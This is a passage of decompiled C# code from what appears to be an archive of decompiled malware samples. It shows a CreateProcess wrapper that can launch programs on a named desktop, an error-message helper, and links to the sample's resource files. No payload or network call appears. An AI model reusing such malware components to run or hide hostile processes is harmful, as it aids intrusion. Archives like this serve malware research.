12 | 		public static WindowsApi.PROCESS_INFORMATION CreateProcess(ProcessStartInfo startInfo, string desktopName = null, int? millisecondsToWait = 100)
13 | 		{
14 | 			WindowsApi.STARTUPINFO startupinfo = default(WindowsApi.STARTUPINFO);
15 | 			startupinfo.cb = Marshal.SizeOf(startupinfo);
16 | 			startupinfo.lpDesktop = desktopName;
17 | 			WindowsApi.PROCESS_INFORMATION process_INFORMATION = default(WindowsApi.PROCESS_INFORMATION);
18 | 			string lpCommandLine = startInfo.FileName + " " + startInfo.Arguments;
19 | 			WindowsApi.PROCESS_INFORMATION result;
20 | 			if (WindowsApi.CreateProcess(null, lpCommandLine, IntPtr.Zero, IntPtr.Zero, true, 32, IntPtr.Zero, startInfo.WorkingDirectory, ref startupinfo, ref process_INFORMATION))
21 | 			{
22 | 				if (millisecondsToWait != null)
23 | 				{
24 | 					WindowsApi.WaitForInputIdle(process_INFORMATION.hProcess, (uint)millisecondsToWait.Value);
25 | 				}
26 | 				WindowsApi.CloseHandle(process_INFORMATION.hThread);
27 | 				result = process_INFORMATION;
28 | 			}
29 | 			else
30 | 			{
31 | 				result = default(WindowsApi.PROCESS_INFORMATION);
32 | 			}
33 | 			return result;
34 | 		}
35 | 
36 | 		// Token: 0x06000008 RID: 8 RVA: 0x00002938 File Offset: 0x00000B38
37 | 		public static string GetLastErrorMessage()
38 | 		{
39 | 			return new Win32Exception(Marshal.GetLastWin32Error()).Message;
40 | 		}
41 | 	}
42 | }
43 | 


--------------------------------------------------------------------------------
/Unk1/sdfsdf/sdfsdf.g.resources:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/p3pperp0tts/malware_decompiled_code/6fb231cdf62c9232524190a5da02f2af28242380/Unk1/sdfsdf/sdfsdf.g.resources


--------------------------------------------------------------------------------
/Unk1/sdfsdf/sdfsdf.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/p3pperp0tts/malware_decompiled_code/6fb231cdf62c9232524190a5da02f2af28242380/Unk1/sdfsdf/sdfsdf.ico


--------------------------------------------------------------------------------